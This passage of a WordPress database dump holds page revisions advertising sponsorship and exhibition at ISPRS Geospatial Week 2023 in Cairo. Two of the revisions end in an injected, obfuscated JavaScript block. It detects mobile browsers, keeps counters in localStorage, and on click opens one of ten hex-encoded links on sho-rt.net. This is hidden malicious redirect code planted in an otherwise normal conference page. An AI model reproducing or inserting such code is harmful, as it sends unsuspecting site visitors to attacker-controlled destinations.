href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 12:26:56','2022-10-26 12:26:56','',2920,'https://gsw2023.com/?p=2926',0,'revision','',0),
(2927,1,'2022-10-26 12:46:00','2022-10-26 12:46:00','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 12:46:00','2022-10-26 12:46:00','',2920,'https://gsw2023.com/?p=2927',0,'revision','',0),
(2928,1,'2022-10-26 13:02:27','2022-10-26 13:02:27','','ext1','','inherit','open','closed','','ext1','','','2022-10-26 13:02:27','2022-10-26 13:02:27','',2920,'https://gsw2023.com/wp-content/uploads/2022/10/ext1.jpg',0,'attachment','image/jpeg',0),
(2929,1,'2022-10-26 13:04:05','2022-10-26 13:04:05','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" 